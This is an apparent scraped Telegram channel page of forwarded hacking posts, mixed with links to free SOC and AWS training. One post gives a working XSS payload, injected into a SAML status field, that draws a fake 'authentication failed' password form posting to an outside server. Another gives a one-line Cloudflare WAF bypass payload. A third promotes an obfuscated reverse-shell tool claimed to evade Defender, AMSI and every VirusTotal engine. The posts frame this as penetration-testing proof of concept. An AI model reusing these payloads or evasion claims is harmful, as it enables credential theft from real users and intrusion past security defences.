UNDERCODE COMMUNITY
2.68K subscribers
1.23K photos
31 videos
2.65K files
80.1K links
๐Ÿฆ‘ Undercode Cyber World!
@UndercodeCommunity


1๏ธโƒฃ World first platform which Collect & Analyzes every New hacking method.
+ AI Pratice
@Undercode_Testing

2๏ธโƒฃ Cyber & Tech NEWS:
@Undercode_News

3๏ธโƒฃ CVE @Daily_CVE

โœจ Web & Services:
โ†’ Undercode.help
Download Telegram
Forwarded from UNDERCODE TESTING
Media is too big
VIEW IN TELEGRAM
๐Ÿฆ‘ The Official NASA CSRF Vulnerability Video
Forwarded from Exploiting Crew (Pr1vAt3)
Forwarded from Exploiting Crew (Pr1vAt3)
๐Ÿฆ‘ Leveling Up Our XSS Proof of Concepts at CybaVerse :

It's not uncommon to find a Cross-Site Scripting (XSS) vulnerability but at CybaVerse, we strive to go beyond basic alert(1) and demonstrate real-world impact with meaningful Proof of Concepts (POCs).

We recently encountered an XSS vulnerability within a SAML Sign-in flow โ€” not your typical low-hanging fruit. Crafting a working payload took some finesse due to HTML encoding requirements. But with a bit of creativity, we managed to inject a script that could:
๐Ÿ”น Manipulate the HTML to display a fake login prompt.
๐Ÿ”น Capture user-entered passwords and send them to our server.

Even though traditional XSS exploits, such as session hijacking, bypassing CSRF protections, or performing authenticated user actions were mitigated by the applicationโ€™s defences, this vulnerability still allowed us to:
๐Ÿ”น Phish user credentials via a convincing fake prompt.
๐Ÿ”น Demonstrate impact beyond simple alert pop-ups or redirects.

Hereโ€™s a snippet of the payload I crafted:

โš ๏ธ <samlp:StatusCode Value="XSS POC&#39;;document.body.innerHTML=&#39;&lt;br&gt;&lt;h1&gt;Authentication failed, re-enter your password&lt;/h1&gt;&lt;br&gt;&lt;form action=&quot;//https://lnkd.in/ecG5926A&quot; method=&quot;post&quot;&gt;&lt;input type=&quot;password&quot; name=&quot;password&quot;&gt;&lt;br&gt;&lt;button type=&quot;submit&quot;&gt;Submit&lt;/button&gt;&lt;/form&gt;&#39;+document.body.innerHTML;&"/> โš ๏ธ

The image below shows the entered password if someone fell for the prompt: โ€œAuthentication failed, re-enter your password.โ€

Our goal is always to provide actionable insights and impactful POCs to help clients understand the risks better.

Ref: Michael Jepson
@UndercodeCommunity
โ– โ–‚ โ–„ U๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
Forwarded from Exploiting Crew (Pr1vAt3)
๐Ÿฆ‘FREE ๐’๐Ž๐‚ ๐ญ๐ซ๐š๐ข๐ง๐ข๐ง๐ ๐ฌ:

โœ…Microsoft Security Operations Analyst:
https://lnkd.in/eKTXEmna

โœ…TryHackMe
SOC level 1: https://lnkd.in/enkunj-B
SOC level 2: https://lnkd.in/eg4znfJr

@UndercodeCommunity
โ– โ–‚ โ–„ U๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
Forwarded from Exploiting Crew (Pr1vAt3)
This media is not supported in your browser
VIEW IN TELEGRAM
Forwarded from Exploiting Crew (Pr1vAt3)
Wanna Bypass Detections ?
Forwarded from Exploiting Crew (Pr1vAt3)
๐Ÿฆ‘Bypass Virustotal detection

>> Narashima is designed to bypass both Microsoft Defender and AMSI, as well as every available AV software in VirusTotal, achieving a 0% detection rate and no high malicious behaviour rate.

This tool provides a reverse shell with unmatched stealth, making it an essential asset for cybersecurity professionals focused on security research, ethical hacking, and penetration testing.

๐Ÿ’ก Key Highlights:

- Bypass Detection: Successfully bypasses Microsoft Defender, AMSI, and all available AV softwares with 0 detections including Google, SentinelOne, Kaspersky, Sophos.

- Zero Malicious Behavior Rate: Narashima operates without triggering any suspicious alerts.

>> Tested on : Win11 Pro

Iโ€™ve spent considerable time studying and implementing this obfuscation methodology and am thrilled with the results. Looking forward to collaborating with the community to enhance its capabilities further!

@UndercodeCommunity
โ– โ–‚ โ–„ U๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
Forwarded from UNDERCODE NEWS (Copyright & Fact Checker)
Forwarded from UNDERCODE NEWS (Copyright & Fact Checker)
โšก๏ธ CharacterAI Gets Safer: New #AI Model for Kids and Parental Controls

https://undercodenews.com/characterai-gets-safer-new-ai-model-for-kids-and-parental-controls/

@Undercode_News
Forwarded from Exploiting Crew (Pr1vAt3)
๐Ÿฆ‘Cloudflare_WAF_Bypass by xss0r: NEW Meth !!!


>> Payload: <details open ontoggleโ€‹=alert('xss0r')>


@UndercodeCommunity
โ– โ–‚ โ–„ U๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
Forwarded from Exploiting Crew (Pr1vAt3)
Forwarded from Exploiting Crew (Pr1vAt3)
๐Ÿฆ‘14 FREE AWS Knowledge Learning Badges! ๐Ÿ˜ฑ

What better way to strut ๐Ÿ•บ๐Ÿป your AWS skills than by earning and flaunting ๐Ÿ’ƒ these badges?

Here you can dive into what each badge entails, and YES, the training is absolutely FREE on AWS Skill Builder! ๐Ÿ†“

๐Ÿ’Ž Dive into Cloud Essentials here:
https://lnkd.in/gzYfiR5W
๐Ÿ’Ž Enhance Architecting skills here:
https://lnkd.in/gxQTERJQ
๐Ÿ’Ž Learn Serverless with this:
https://lnkd.in/g_q_mChp
๐Ÿ’Ž Learn about Kubernetes on AWS:
https://lnkd.in/g9h4gzEe
๐Ÿ’Ž File Storage expertise awaits here:
https://lnkd.in/gadMBhmK
๐Ÿ’Ž Data Protection & Disaster Recovery training:
https://lnkd.in/gX_we9Gv
๐Ÿ’Ž AWS Networking Core:
https://lnkd.in/g3u_JTfK
๐Ÿ’Ž Migration lessons here:
https://lnkd.in/gKaqyA3f
๐Ÿ’Ž AWS Compute Knowledge:
https://lnkd.in/gptkhZjh
๐Ÿ’Ž AWS Data Migration Training:
https://lnkd.in/gBjaht2n
๐Ÿ’Ž Get into Cloud Game Development:
https://lnkd.in/ghz4jyKX
๐Ÿ’Ž AWS Events and Workflows here:
https://lnkd.in/gEi78XcX
๐Ÿ’Ž Dive into Media & Entertainment foundations:
https://lnkd.in/gjHBP_SF
๐Ÿ’Ž Amazon Braket at:
https://lnkd.in/gGKHpQGf

Ref: Greg Powell
@UndercodeCommunity
โ– โ–‚ โ–„ U๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
Forwarded from Exploiting Crew (Pr1vAt3)
๐Ÿฆ‘Understanding Cybersecurity Layers: A Comprehensive Overview

Cybersecurity is not just about implementing one solution; itโ€™s about building multiple layers of defense to protect against various threats.

@UndercodeCommunity
โ– โ–‚ โ–„ U๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–